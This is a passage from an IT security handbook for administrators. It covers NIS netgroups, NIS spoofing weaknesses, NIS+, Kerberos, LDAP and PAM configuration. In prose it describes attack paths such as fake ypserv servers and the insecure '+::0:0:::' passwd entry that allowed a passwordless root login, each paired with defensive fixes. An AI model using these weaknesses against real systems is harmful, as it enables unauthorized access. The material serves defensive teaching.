etc/netgroup. This file consists of one or more lines that have the form: groupname member1 member2 ... Each member can specify a host, a user, and a NIS domain. The members have the form: (hostname, username, domainname) If a username is not included, then every user at the host hostname is a member of the group. If a domainname is not provided, then the current domain is assumed.217 217It is best to create netgroups in which every member has a username (a netgroup of users) or in which every member has a hostname but does not have a username (a netgroup of hosts). Creating netgroups in which some members are users and some members are hosts makes mistakes somewhat more likely. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 253 Setting up netgroups The /etc/yp/makedbm program (sometimes found in /usr/etc/yp/makedbm) processes the netgroup file into a number of database files that are stored in: /etc/yp/domainname/netgroup.dir /etc/yp/domainname/netgroup.pag /etc/yp/domainname/netgroup.byuser.dir /etc/yp/domainname/netgroup.byuser.pag /etc/yp/domainname/netgroup.byhost.dir /etc/yp/domainname/netgroup.byhost.pag Note that /etc/yp may be symbolically linked to /var/yp on some machines. If you have a small organization, you might simply create two netgroups: one for all of your users, and a second for all of your client machines. These groups will simplify the creation and administration of your system's configuration files. If you have a larger organization, you might create several groups. For example, you might create a group for each department's users. You could then have a master group that consists of all of the subgroups. Of course, you could do the same for your computers as well. Consider the following science department: Math (mathserve,,) (math1,,) (math2,,) (math3,,) Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,) Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,) Science Math Chemistry Biology Netgroups are important for security because you use them to limit which users or machines on the network can access information stored on your computer. You can use netgroups in NFS files to limit who has access to the partitions, and in data files such as /etc/passwd, to limit which entries are imported into a system. Using netgroups to limit the importing of accounts You can use the netgroups facility to control which accounts are imported by the /etc/ passwd file. For example, if you want to simply import accounts for a specific net-group, then follow the plus sign (+) with an at sign (@) and a netgroup: root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh +@operators::999:999::: The above will bring in the NIS password map entry for the users listed in the operators group. You can also exclude users or groups using a minus sign (-) if you list the exclusions before you list the net-groups. PART The +@netgroup and -@netgroup notation does not work on all versions of NIS, and historically has not worked FIVE reliably on others. If you intend to use these features, check your system to verify that they are behaving as expected. Simply reading your documentation is not sufficient. 254 IT SECURITY FOR TECHNICAL ADMINISTRATORS Limitations of NIS NIS has been the starting point for many successful penetrations into Unix networks. Because NIS controls user accounts, if you can convince an NIS server to broadcast that you have an account, you can use that fictitious account to break into a client on the network. NIS can also make confidential information, such as encrypted password entries, widely available. There are design flaws in the code of the NIS implementations of several vendors that allow a user to reconfigure and spoof the NIS system. This spoofing can be done in two ways: by spoofing the underlying remote procedure call (RPC) system, and by spoofing NIS. Spoofing RPC Remote procedure calls (RPC) enable one system on a network to call functions on another system. The NIS system depends on the functioning of the RPC portmapper service. This is a daemon that matches supplied service names for RPC with IP port numbers at which those services can be contacted. Servers using RPC will register themselves with portmapper when they start, and will remove themselves from the portmap database when they exit or reconfigure. Early versions of portmapper allowed any program to register itself as an RPC server, allowing attackers to register their own NIS servers and respond to requests with their own password files. Most current versions of portmapper rejects requests to register or delete services if they come from a remote machine, or if they refer to a privileged port and come from a connection initiated from a unprivileged port. Thus only the superuser can make requests that add or delete service mappings to privileged ports, and all requests can only be made locally. However, not every vendor's version of the portmapper daemon performs these checks. Note that NFS and some NIS services often register on unprivileged ports. In theory, even with the checks outlined above, an attacker could replace one of these services with a specially written program that would respond to system requests in a way that would compromise system security. Spoofing NIS NIS clients get information from an NIS server through RPC calls. A local daemon, ypbind, caches contact information for the appropriate NIS server daemon, ypserv. The ypserv daemon may be local or remote. Under early SunOS versions of the NIS service (and possibly versions by some other vendors), it was possible to instantiate a program that acted like ypserv and responded to ypbind requests. The local ypbind daemon could then be instructed to use that program instead of the real ypserv daemon. As a result, an attacker could supply his or her own version of the password file (for instance) to a login request! (The security implications of this should be obvious.) Current NIS implementations of ypbind have a ­secure or ­s command line flag that can be provided when the daemon is started. If the flag is used, the ypbind daemon will not accept any information from a ypserv server that is not running on a privileged port. Thus, a user-supplied attempt to masquerade as the ypserv daemon will be ignored. A user can't spoof ypserv unless that user already has superuser privileges. There is no good reason not to use the -secure flag. Unfortunately, the -secure flag has a flaw. If the attacker is able to subvert the root account on any other machine on the local network and start a version of ypserv using his own NIS information, he need only point the target ypbind daemon to that server. The compromised server would be running on a privileged port, so its responses Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 255 would not be rejected. An attacker could also write a "fake" ypserv that runs on a PC-based system. Privileged ports have no meaning in this context, so any user can run the server on any port and feed information to the target ypbind process. NIS is confused about "+" Even when NIS clients contact the correct servers, NIS can present other security difficulties. For example, a combination of installation mistakes and changes in NIS itself has caused some confusion with respect to the NIS plus sign (+) in the /etc/passwd file. If you use NIS, be very careful that the plus sign is in the /etc/passwd file of your clients, and not your servers. On a NIS server, the plus sign can be interpreted as a user-name under some versions of the Unix operating system. The simplest way to avoid this problem is to make sure that you do not have the "+" account on your NIS server. Attempting to figure out what to put on your client machine is another matter. With early versions of NIS, the following line was distributed: +::0:0::: Correct on SunOS and Solaris Unfortunately, this line presented a problem. When NIS was not running, the plus sign was sometimes taken as an account name, and anybody could log into the computer by typing + at the login: prompt--and without a password! Even worse, the person logged in with superuser privileges.218 One way to minimize the danger was by including a password field for the plus user. Specify the plus sign line in the form: +:*:0:0::: On NIS clients only Unfortunately, under some versions of NIS this entry actually means "import the passwd map, but change all of the encrypted passwords to "*", which effectively prevents everybody from logging in. This entry wasn't right either! The easiest way to deal with this confusion is simply to attempt to log into your NIS clients and servers using a + as a username. You may also wish to try logging in with the network cable unplugged, to simulate what happens to your computer when the NIS server cannot be reached. In either case, you should not be able to log in by simply typing + as a username. This test will tell you if your server is properly configured. If you are running a recent version of your operating system, do not think that your system is immune to the + confusion in the NIS sub-system. In particular, some NIS versions on Linux got this wrong too. Improving NIS security NIS databases contain sensitive information. There are several ways to prevent unauthorized disclosure of your NIS databases. As with most security improvements, you can combine several of these for a layered "defense-in-depth" approach: PART 1. Protect your site with a firewall, or at least a smart router, and do not allow the UDP packets associated with RPC to cross between your internal network and the outside world. Unfortunately, because RPC is based on the FIVE portmapper, the actual UDP port that is used is not fixed. In practice, the only safe strategy is to block all UDP packets except those that you specifically wish to let cross. 2. Use a portmapper program that allows you to specify a list of computers (by hostname or IP address) that should 218On Sun's NIS implementation, and possibly others, this danger can be ameliorated somewhat by avoiding 0 or other local user values as the UID and GID values in NIS entries in the passwd file. 256 IT SECURITY FOR TECHNICAL ADMINISTRATORS be allowed or denied access to specific RPC servers. If you don't have a firewall, an attacker can still scan for each individual RPC service without consulting the portmapper, but if they do make an attempt at the portmapper first, an improved version may give you warning. 3. Find out if your version of NIS uses the /var/yp/securenets file on NIS servers. This file, when present, can be used to specify a list of networks that may receive NIS information. Other versions may provide other ways for the ypserv daemon to filter addresses that are allowed to access particular RPC servers. 4. Don't tighten up NIS but forget about DNS! If you decide that outsiders should not be able to learn your site's IP addresses, be sure to run two nameservers -- one for internal use and one for external use. Sun's NIS+ NIS was designed for a small, friendly computing environment. As Sun Microsystem's customers began to build networks with thousands of workstations, NIS proved to be too unwieldy and insecure for enterprise use. Sun Microsystems started working on an NIS replacement in 1990. That system was released a few years later as NIS+. NIS+ quickly earned a bad reputation. By all accounts, the early releases were virtually untested and rarely operated as promised. Furthermore, the documentation was confusing and incomplete. Eventually, Sun worked the bugs out of NIS+ and today it is a more reliable system for secure network management and control. An excellent reference for people using NIS+ is Rick Ramsey's book, All About Administrating NIS+ (SunSoft Press, Prentice Hall, 1994). What NIS+ Does NIS+ creates network databases that are used to store information about computers and users within an organization. NIS+ calls these databases tables; they are functionally similar to NIS maps. Unlike NIS, NIS+ allows for incremental updates of the information stored on replicated database servers throughout the network. Each NIS+ domain has exactly one NIS+ root domain server. This is a computer that contains the master copy of the information stored in the NIS+ root domain. The information stored on this server can be replicated, allowing the network to remain usable even when the root server is down or unavailable. There may also be NIS+ servers for subdomains. Entities that communicate using NIS+ are called NIS+ principals. An NIS+ principal may be a host or an authorized user. Each NIS+ principal has a public key and a secret key, which are stored on an NIS+ server in the domain. All communication between NIS+ servers and NIS+ principals take place through Secure RPC, a version of RPC that authenticates and protects procedure calls with DES encryption. This makes the communication resistant to both eavesdropping and spoofing attacks. NIS+ also oversees the creation and management of Secure RPC keys. By virtue of using NIS+, every member of the organization is enabled to use Secure RPC. NIS+ Tables and Other Objects All information stored on an NIS+ server is stored in the form of objects. NIS+ supports three fundamental types of objects. Tables store configuration information; groups collectively refer to a set of NIS+ principals and are used for authorization; directories are containers for tables, groups, or other directories, and provide a tree structure to the NIS+ server. NIS+ predefines 16 tables, including tables for hosts and networks, protocols and services, user accounts and passwords, user groups and netgroups, e-mail aliases, and others; users are free to create additional tables of their own. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 257 Using NIS+ Using an NIS+ domain can be remarkably pleasant. When a user logs in to a workstation, the login process automatically acquires the user's NIS+ security credentials and attempts to decrypt them with the user's login password. If the account password and the NIS+ credentials password are the same (and they usually are), the NIS+ keyserv process will cache the user's secret key and the user will have transparent access to all Secure RPC services. If the account password and the NIS+ credentials password are not the same, then the user will need to manually log in to the NIS+ domain by using the keylogin command. NIS+ users change their passwords with the NIS+ nispasswd command, which works in much the same way as the standard UNIX passwd command. NIS+ security is implemented by providing a means for authenticating users, and by establishing access control lists that control the ways that those authenticated users can interact with the information stored in NIS+ tables. NIS+ provides for two authentication types. Local authentication is based on the UID executing an NIS+ command and is used largely for administrating the root NIS+ server. DES authentication is based on Secure RPC. Each NIS+ object has an owner, which is usually the object's creator. (An object's owner can be changed with the nischown command.) NIS+ objects also have access control lists, which are used to control which principals have what kind of access to the object: read, modify, create, destroy, or a combination. Four types of principals may have access rights to an object: nobody (unauthenticated requests), the object's owner, principals in the object's group, and other authenticated principals. NIS+ tables may provide additional access privileges for individual rows, columns or entries that they contain. Thus, all authenticated users may have read access to an entire table, but each user may further have the ability to modify the row of the table associated with the user's own account. Note that while permissions on individual rows, columns, or entries can broaden the access control list, they cannot impose more restrictive rules. Limitations of NIS+ If properly configured, NIS+ can be a very secure system for network management and authentication. However, like all security systems, it is possible to make a mistake in the configuration or management of NIS+ that would render a network that it protects somewhat less than secure. Here are some things to be aware of: Do not run NIS+ in NIS compatibility mode NIS+ has an NIS compatibility mode that allows the NIS+ server to interoperate with NIS clients. If you run NIS+ in this mode, then any NIS server on your network (and possibly other networks as well) will have the ability to access any piece of information stored within your NIS+ server. Manually inspect the permissions of NIS+ objects on a regular basis System integrity checking software does not exist (yet) for NIS+. In its absence, you must manually inspect the NIS+ tables, directories, and groups on a regular basis. Be on the lookout for objects that can be modified by Nobody or by World; also be on the lookout for tables in which new objects can be created by these principal classes. PART Secure the computers on which your NIS+ servers are running FIVE Your NIS+ server is only as secure as the computer on which it is running. If attackers can obtain root access on your NIS+ server, they can make any change that they wish to your NIS+ domain, including creating new users, changing user passwords, and even changing your NIS+ server's master password. 258 IT SECURITY FOR TECHNICAL ADMINISTRATORS Use NIS+ security level 2 on servers NIS+ servers can operate at three security levels, denoted 0, 1, and 2. Only at level 2 is full security authentication and access checking enabled, and only level 2 security should be used for NIS+ servers. Kerberos At the Massachusetts Institute of Technology in the late 1980's, hundreds of high-performance workstations with big screens, fast (for the time) processors, small disks, and Ethernet interfaces replaced the older system of a few large timesharing computers with terminals. The goal was to allow any user to sit down at any computer and enjoy full access to his files and to the network. As soon as the workstations were deployed, the problem of network eavesdropping became painfully obvious; with the network accessible from all over campus, nothing prevented students (or outside intruders) from running network spy programs. It was nearly impossible to prevent the students from learning the superuser password of the workstations or simply rebooting them in single-user mode. To further complicate matters, many of the computers on the network were IBM PC/ATs running software that didn't have even rudimentary computer security. Something had to be done to protect student files in the networked environment to the same degree that they were protected in the time-sharing environment. MIT's ultimate solution to this security problem was Kerberos, an authentication system that uses DES cryptography to protect sensitive information such as passwords on an open network. When the user logs in to a workstation running Kerberos, that user is issued a ticket from the Kerberos server. The user's ticket can only be decrypted with the user's password; it contains information necessary to obtain additional tickets. From that point on, whenever the user wishes to access a network service, an appropriate ticket for that service must be presented. As all of the information in the Kerberos tickets is encrypted before it is sent over the network, the information is not susceptible to eavesdropping or misappropriation. Kerberos 4 vs. Kerberos 5 Kerberos has gone through five major revisions during its history to date. Currently there are two versions of Kerberos in use in the marketplace. Kerberos 4 is more efficient than Kerberos 5, but more limited. For example, Kerberos 4 can only work over TCP/IP networks. Kerberos 4 has not been updated in many years, and is currently deprecated. In early 1996, graduate students with the COAST Laboratory219 at Purdue University discovered a long-standing weakness in the key generation for Kerberos 4 that allows an attacker to guess session keys in a matter of seconds. Although a patch for this vulnerability has been widely distributed, some Kerberos 4 implementations are known to be vulnerable to buffer-overflow attacks and no patches have been posted. Kerberos 5 fixes minor problems with the Kerberos protocol, making it more resistant to determined attacks over the network. Kerberos 5 is also more flexible: it can work with different kinds of networks. Kerberos 5 also has provisions for working with encryption schemes other than DES. Although algorithms such as Triple-DES have been implemented, their use is not widespread, largely because of legacy applications that expect DES encryption. Finally, Kerberos 5 supports delegation of authentication, ticket expirations longer than 21 hours, renewable tickets, tickets that will work sometime in the future, and many more options. If you are going to use Kerberos, you should definitely use version 5. IETF is working to revise and clarify RFC 1510, which defines Kerberos 5, and major protocol extensions are expected to follow. 219Incorporated into the CERIAS research center in 1998. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 259 Kerberos Authentication Kerberos authentication is based entirely on the knowledge of passwords that are stored on the Kerberos Server. Unlike Unix passwords, which are encrypted with a one-way algorithm that cannot be reversed, Kerberos passwords are stored on the server encrypted with a conventional encryption algorithm--in most cases, DES--so that they can be decrypted by the server when needed. A user proves her identity to the Kerberos Server by demonstrating knowledge of her key. The fact that the Kerberos Server has access to the user's decrypted password is a result of the fact that Kerberos does not use public key cryptography.220 This is a serious disadvantage of the Kerberos system. It means that the Kerberos Server must be both physically secure and "computationally secure." The server must be physically secure to prevent an attacker from stealing the Kerberos Server and learning all of the users' passwords. The server must also be immune to login attacks: if an attacker could log onto the server and become root, that attacker could, once again, steal all of the passwords. Kerberos was designed so that the server can be stateless. The Kerberos Server simply answers requests from users and issues tickets (when appropriate). This design makes it relatively simple to create replicated, secondary servers that can handle authentication requests when the primary server is down or otherwise unavailable. Unfortunately, these secondary servers need complete copies of the entire Kerberos database, which means that they must also be physically and computationally secure. Initial login Logging into a workstation that is using Kerberos looks the same to a user as logging into a regular computer. You type your username and password, and if they are correct, you get logged in. Accessing files, electronic mail, printers, and other resources all work as expected. What happens behind the scenes, however, is far more complicated. When the workstation's login process, sshd221, other network daemon, or authentication library (such as PAM) knows about Kerberos, it uses the Kerberos system to authenticate the user. First, the Kerberos client needs to know where to find Kerberos servers. This can be configured manually on each client (traditionally in the krb5.conf file), or Kerberos servers can be advertised through DNS SRV records. IETF Internet-Draft draft-ietf-krb-wg-krb-dns-locate describes this approach. With Kerberos 4, the workstation sends a message to the Kerberos Authentication Server222 after you type your username. This message contains your username and indicates that you are trying to log in. The Kerberos Server checks its database and, if you are a valid user, sends back a ticket granting ticket that is encrypted with a cryptographic digest of your password. The workstation then asks you to type in your password and finally attempts to decrypt the encrypted ticket using the password that you've supplied. If the decryption is successful, the workstation then forgets your password, and uses the ticket granting ticket exclusively. If the decryption fails, the workstation knows that you supplied the wrong password and it gives you a chance to try again. PART 220 FIVE Public key cryptography was not used because it was still under patent protection at the time that Kerberos was developed. There is a current IETF Internet Draft entitled "Public Key Cryptography for Initial Authentication in Kerberos" that proposes methods for combining public key smartcards with Kerberos. This draft has been implemented in Microsoft's Kerberos. 221Patches for OpenSSH to use Kerberos 5 for authentication are available at http://www.sxw.org.uk/computing/ patches/openssh.html. Although Kerberos 4 has also been used with SSH, it's much more difficult to make the two systems interoperate. Fortunately, the SSH protocol version 2 can use the same security layer (GSSAPI) as Kerberos 5, which simplifies things considerably. The IETF Internet-Draft that covers the combination of these systems is draft-ietf-secsh-gsskeyex. 222According to the Kerberos papers and documentation, there are two logical Kerberos Servers: the Authentication Server and the Ticket Granting Service. Some commentators think that this is disingenuous, because all Kerberos systems employ a single physical server, the Kerberos Server or Key Server. 260 IT SECURITY FOR TECHNICAL ADMINISTRATORS With Kerberos 5, the workstation waits until after you have typed your password before contacting the server. It then sends the Kerberos Authentication Server a message consisting of your username and the current time encrypted with your password. The Authentication Server looks up your username, determines your password, and attempts to decrypt the encrypted time. If the server can decrypt the current time (and the value is indeed current), it then creates a ticket granting ticket, encrypts it with your password, and sends to you.223 The ticket granting ticket is a block of data that contains a session key and a ticket for the Kerberos Ticket Granting Service, encrypted with both the session key and the Ticket Granting Service's key. The user's workstation can now contact the Kerberos Ticket Granting Service to obtain tickets for any principal within the Kerberos realm--that is, the set of servers and users that are known to the Kerberos Server. For example, when the user first tries to access his files from a Kerberos workstation, system software on the workstation contacts the Ticket Granting Service and asks for a ticket for the File Server Service. The Ticket Granting Service sends the user back a ticket for the File Server Service. This ticket contains another ticket, encrypted with the File Server Service's password, that the user's workstation can present to the File Server Service to request files. The contained ticket includes the user's authenticated name, the expiration time, and the Internet address of the user's workstation. The user's workstation then presents this ticket to the File Server Service. The File Server Service decrypts the ticket using its own password, then builds a mapping between the (UID, IP address) of the user's workstation and a UID on the file server. Kerberos puts the time of day in requests to prevent an eavesdropper from intercepting a request and retransmitting it from the same host at a later time in a replay attack. Kerberos offers several security advantages. Passwords are stored on the Kerberos Server, not on the individual workstations, and are never transmitted on the network ­ encrypted or otherwise. The Kerberos Authentication Server is able to authenticate the user's identity, because the user knows the user's password, and similarly, the user is able to authenticate the Kerberos Server's identity, because the Kerberos Authentication Server knows the user's password. Other Kerberos services can authenticate the user because the user will present a ticket that is known to have been issued by the Ticket Granting Service because it is encrypted with the target service's key. An eavesdropper who intercepts a ticket from the Kerberos Server can't use it, because it is encrypted using a key (for a Kerberos service or derived from the user's password) that the eavesdropper doesn't know. Authentication, data integrity, and secrecy Kerberos is a general-purpose system for sharing secret keys between principals on the network. Normally, Kerberos is used solely for authentication. However, the ability to exchange keys can also be used to ensure data integrity and secrecy. If eavesdropping is an ongoing concern, all information transmitted between the work-station and the service can be encrypted using a key that is exchanged between the two principals. Unfortunately, encryption carries a performance penalty. At MIT, encryption was used for transmitting highly sensitive information such as passwords, but was not used for most data transfer, such as files and electronic mail. Tickets issued by Kerberos expire after eight hours, a technique designed to prevent a replay attack.224 Thus, after eight hours, you must run the kinit program, and provide your username and password a second time, to be issued a new ticket for the Kerberos Ticket Granting Service. 223Why the change in protocol? Kerberos 4 attempts to minimize the amount of time that the user's password is stored on the workstation. Unfortunately, this makes Kerberos 4 susceptible to offline password-guessing attacks against the ticket granting ticket. With Kerberos 5, the workstation must demonstrate to the Kerberos Authentication Server that the user knows the correct password. This is a more secure system, although the user's encrypted ticket granting ticket can still be intercepted as it is sent from the server to the workstation by an attacker and attacked with an exhaustive key search. 224A different window may be chosen at some sites. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 261 For single-user workstations, Kerberos provides significant additional security beyond that of regular passwords. However, if two people are logged into the workstation at the same time, then the workstation will be authenticated for both users. These users can then pose as each other. This threat is so significant that at MIT, remote login services were disabled on workstations to prevent an attacker from logging in while a legitimate user was being authenticated. It is also possible for someone to subvert the local software to capture the user's password as it is typed (as with a regular system). Getting Kerberos Kerberos or Kerberos- like security systems are now available from several companies, as well as being a standard part of several operating systems, including Solaris, Mac OS X, and many Linux and BSD distributions. A version of Kerberos 5 has been included in Microsoft Windows from the Windows 2000 release onwards. It is possible (with some effort) to make Kerberos interoperable between Unix machines and Windows platforms.225 If you need to install Kerberos from scratch, the MIT Kerberos source code is available to United States and Canadian citizens from http://web.mit.edu/kerberos/www/ and to others from http://www.crypto-publish.org. You can also find official updates, patches, and bug announcements. Kerberos has had several bugs discovered, so it is important that you ensure that you are using the most recent version of the code. There is also a free software implementation of Kerberos called Heimdal that is under active development; it is largely compatible with MIT's Kerberos. You can get Heimdal at http://www.pdc.kth.se/heimdal/. The changes required to your system's software are substantial if you need to do it yourself; see the documentation provided with Kerberos for details. Kerberos and LDAP Kerberos mixes well with LDAP (discussed in the next section). Kerberos can be used to authenticate and secure LDAP queries and updates. Conversely, the LDAP database can store information about users that is more extensive than the data maintained by Kerberos alone, such as the user's home directory, shell, phone number, or other organizational information. Together, the two services can provide all of the functionality of NIS or NIS+, and they are being increasingly used to do so. Jason Heiss provides a good guide to this process on his page "Replacing NIS with Kerberos and LDAP" at http://www.ofb.net/~jheiss/krbldap/ LDAP is sometimes used to store Kerberos keys. The Windows implementation of Kerberos uses Microsoft's Active Directory Service (a flavor of LDAP) to store Kerberos keys. Heimdal Kerberos supports this functionality. MIT Kerberos does not, out of concern that sensitive security infrastructure should be centralized at the Kerberos server, rather than distributed via LDAP. Kerberos Limitations Although Kerberos is an excellent solution to a difficult problem, it has several short-comings: Every network service must be individually modified for use with Kerberos Because of the Kerberos design, every program that uses Kerberos must be modified. The process of performing PART these modifications is often called "Kerberizing" the application. Typically, to Kerberize an application, you must have the application's source code, or the application must use a security framework that already incorporates FIVE Kerberos, such as PAM (discussed at the end of this chapter). 225Note, however, that Microsoft has made proprietary modifications to the Kerberos protocol which have the effect of forcing Windows clients to use Kerberos servers running on Windows servers. In a mixed Unix-Windows environment, the Windows 2000 machine must be the Kerberos server to provide full functionality. 262 IT SECURITY FOR TECHNICAL ADMINISTRATORS Kerberos doesn't work well in a time-sharing environment Kerberos is designed for an environment in which there is one user per workstation. If a user is sharing the computer with several other people, it is possible that the user's tickets can be stolen -- copied by an attacker. Stolen tickets can then be used to obtain fraudulent service. Kerberos requires a secure and available Kerberos Server By design, Kerberos requires that there be a secure central server that maintains the master password database and that is continuously available. To ensure security, a site should use the Kerberos Server for absolutely nothing beyond running the Kerberos Server program. The Kerberos Server must be kept under lock and key, in a physically secure area. If the Kerberos Server goes down, the Kerberos network is unusable. The Kerberos Server stores all passwords encrypted with the server's master key, which happens to be located on the same hard disk as the encrypted passwords. This means that, in the event that the Kerberos Server is compromised, all user passwords must be changed. Kerberos does not protect against modifications to system software (Trojan horses) Kerberos does not have the local workstation authenticate itself to the user--that is, there is no way for a user sitting at a computer to determine whether the computer has been compromised. This failing is easily exploited by a knowledgeable attacker. These problems are consequences of the fact that, even in a networked environment, many workstations contain local copies of the programs that they run. Kerberos may result in a cascading loss of trust If a server password or a user password is broken or otherwise disclosed, it is possible for an eavesdropper to use that password to decrypt other tickets and use this information to spoof servers and users. Kerberos is a workable system for network security, and it is widely used. But more importantly, the principles behind Kerberos are increasingly available in network security systems that are available directly from vendors. LDAP The Lightweight Directory Access Protocol (LDAP) is a low-overhead version of X..500-base directory access service. It provides for the storage of directory information (including, for authentication systems, usernames and passwords) with access and update over a secure network channel. There are two major versions of LDAP. LDAPv2, described in the 1995 RFC 1777, provides no security for passwords unless it is implemented in conjunction with Kerberos. LDAPv3, described in RFC 2251, adds support for SASL (the Simple Authentication and Security Layer, RFC 2222). SASL provides several additional approaches to secure password authentication (including Kerberos!) Furthermore, both the most widely-used open source implementation of LDAPv3 (OpenLDAP 2.x) and the most widely-used commercial implementation (Microsoft's Active Directory in versions beginning with Windows 2000), support the use of SSL/TLS to secure the entire communication link between client and server, including the authentication process. On its own, LDAP provides general directory services. For example, many organizations deploy LDAP to organize their employee phone, e-mail, and address directory, or directories of computers on the network. We discuss LDAP in this chapter because it can form the basis of an authentication and network information system, and because it is increasingly being used for that purpose, particularly on Windows and Linux systems. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 263 LDAP: The Protocol The LDAP server's data is organized as a tree of entries, each belonging to one or more object classes, and each containing attributes with values. Every entry contains a cn (common name) attribute that distinguishes it from others with the same parent in the tree. For example, an entry belonging to the "posixAccount" object class includes attributes that specify the user's full name (cn), login name (uid), user and group id numbers (uidNumber and gidNumber), home directory (homeDirectory), login shell (loginShell), and other user data. In LDAP terms, a schema is a collection of logically associated object classes and the definitions of their attributes. The posixAccount object class is defined in the network information service schema (nis.schema). LDAP is a client-server protocol. The LDAP client sends requests to the LDAP server, and receives responses back. Clients can send requests to modify the server's data store, or to search it and return one or more attributes of a particular entry, or a whole subtree of entries. Integrity and Reliability Modern LDAP servers (e.g. Active Directory or OpenLDAP 2.x) provide several important features to ensure the integrity of the data and the reliability of the system: Data integrity and confidentiality The LDAP server can accept connections secured by TLS, and can provide end-to-end encryption of the client-server interaction. In addition, TLS makes unauthorized modification of the data stream infeasible. Server authentication To support TLS, the LDAP server is assigned a cryptographic public-key certificate, signed by a trusted certifying authority. LDAP clients with the certificate of the certifying authority can assure themselves that they are communicating with the server they intended to communicate with. Client authentication LDAP servers can also demand TLS certificates from clients, thus insuring that only authorized clients can query or update the server. Replication An LDAP server can replicate entire LDAP datastores onto secondary servers to provide redundancy should the master server fail. LDAP is a powerful and flexible alternative to NIS or NIS+. Its primary advantages include its ability to store and serve non-authentication data as well as authentication information, and the availability of TLS-secured communication. Its primary disadvantage is that updating the LDAP database is more complex than updating an NIS PART master, but several tools have been developed to simplify LDAP administration. FIVE Authentication with LDAP RFC 2307 describes an approach to using LDAP as a network information system. Although this RFC does not specify an Internet standard, its mechanisms are widely used, and a schema to implement them (nis.schema) is included 264 IT SECURITY FOR TECHNICAL ADMINISTRATORS with OpenLDAP 2.x. The schema defines object classes that represent users (posixAccount and shadowAccount), groups (posixGroup), services (ipService), protocols (ipProtocol), remote procedure calls (oncRPC), hosts (ipHost), networks (ipNetwork), NIS netgroups (nisNetgroup, nisMap, nisObject), and more. Each service that authenticates users must be rewritten to perform an LDAP lookup; this is analogous to the "Kerberizing" process that Kerberos requires. This approach is simple for operating systems like Microsoft Windows that require that all authentications use a vendor-distributed API ­ very little rewriting of client software is necessary. For Unix-based operating systems, this approach is inefficient. Instead, two alternatives have been developed, released as open source software by PADL Software Pty, Ltd., and included with most Linux distributions. One, nss_ldap, modifies the C library functions for getting user information (such as getpwent()) to transparently use an LDAP database instead of (or along with) local files, NIS, and so on. Many systems already allow these functions to use a variety of information sources by means of a "name service switch" file (usually /etc/nsswitch.conf). See PUIS, 450-453 for details on configuring authentication using libnss_ldap. Another approach is to use the PAM framework, discussed in the next section. LDAP authentication is implemented as a PAM module, pam_ldap. Unlike libnss_ldap, pam_ldap provides only user authentication against the LDAP database; it does not distribute other data-base information. If your LDAP server is using the standard nis.schema, adding LDAP authentication to a PAM-controlled service is as easy as adding a line to its PAM configuration file that specifies pam_ldap.so as sufficient for authentication, account verification, and password updating. Pluggable Authentication Modules (PAM) Because there are so many ways to authenticate users, it's convenient to have a unified approach to authentication that can handle multiple authentication systems for different needs. The Pluggable Authentication Modules (PAM) system is one such approach. PAM was originally developed by Sun, and implementations are available for Solaris, FreeBSD, and especially Linux, where most PAM development is now centered. PAM provides a library and API that any application can use to authenticate users against a myriad of authentication systems. Each authentication system that PAM knows about is implemented as a PAM module, which in turn is implemented as a dynamically- loaded shared library, PAM modules are available to authenticate users through: o /etc/passwd or /etc/shadow files o NIS or NIS+ o LDAP o Kerberos 4 or 5 o An arbitrary Berkeley DB file226 Each PAM-aware service is configured either in the /etc/pam.conf file or, more commonly, in its own file in the /etc/pam.d directory. For example, the PAM configuration file for the ssh server in Linux distributions is /etc/pam.d/sshd. A service named "other" is used to provide defaults for PAM-aware services that are not explicitly configured. Here is an example of a PAM configuration file for sshd on a Linux server: auth required /lib/security/pam_env.so auth sufficient /lib/security/pam_unix.so auth required /lib/security/pam_deny.so account required /lib/security/pam_unix.so 226If that's not enough layers for you, some applications, such as SMTP authentication in sendmail or access to mailboxes managed by the Cyrus imapd server, use the Cyrus SASL (simple authentication and security layer) authentication library, which can authenticate users with a separate database or through PAM! It is not inconceivable that you might find SASL using PAM using LDAP to authenticate a user's imap connection. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 265 password required /lib/security/pam_cracklib.so retry=3 password sufficient /lib/security/pam_unix.so nullok use_authtok md5 shadow password required /lib/security/pam_deny.so session required /lib/security/pam_limits.so session required /lib/security/pam_unix.so The "auth" lines describe the authentication process for this service, which proceeds in the order specified. Modules marked "required" must run successfully for authentication to progress -- if they fail, the user is considered unauthenticated and generally will be denied access. Multiple "required" modules can be specified; in these cases, all of the modules must run successfully. Modules marked "sufficient," if run successfully, are sufficient to authenticate the user and end the authentication process. In this example, the first module run is pam_env, which optionally sets or clears environment variables specified in /etc/security/pam_env.conf. This module is required -- it must run successfully for authentication to proceed. The next module run is pam_unix, which performs authentication with the usual Unix password files, /etc/passwd and /etc/shadow. If this succeeds, it is sufficient to authenticate the user, and the process is complete. The final authentication module is pam_deny, which simply fails, ending the process with authentication unsuccessful. This particular configuration file will also enforce any account aging or expiration rules of the system, and set resources limits on the user's sshd session. If sshd provided a password-changing function, this configuration file would also prevent the user from changing his password to an easily guessable one, and store passwords in /etc/shadow encrypted by the MD5 cryptographic hash function. The PAM subsystem can be configured in a number of different ways. For instance, it is possible to require two or three separate passwords for some accounts,227 combine a biometric method along with a passphrase, or pick a different mechanism depending on the time of day. It is also possible to remove the requirement of a password for hard-wired lines in highly secured physical locations. PAM allows the administrator to pick a policy that best matches the risk and technology at hand. PAM can do a lot more than authentication, as the examples above suggest. One of its strengths is that it clearly delineates four phases of the access process: verification that the account is viable for the desired service at the desired time and from the desired location (the account phase), authentication of the user (the auth phase), updating passwords and other authentication tokens when necessary (the password phase), and setting up and closing down the user's session (the session phase), which can include limiting resource access and establishing audit trails. PART FIVE 227This is of questionable value when the same user holds all of the passwords. This approach can be valuable when the passwords are assigned to different users, so that any login requires two or more people, and creates a "witness" trail. 266 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 6. SERVER SECURITY At a Glance Server security is the security of the computer on which your Internet servers are running. This chapter discusses some of the most common security problems that 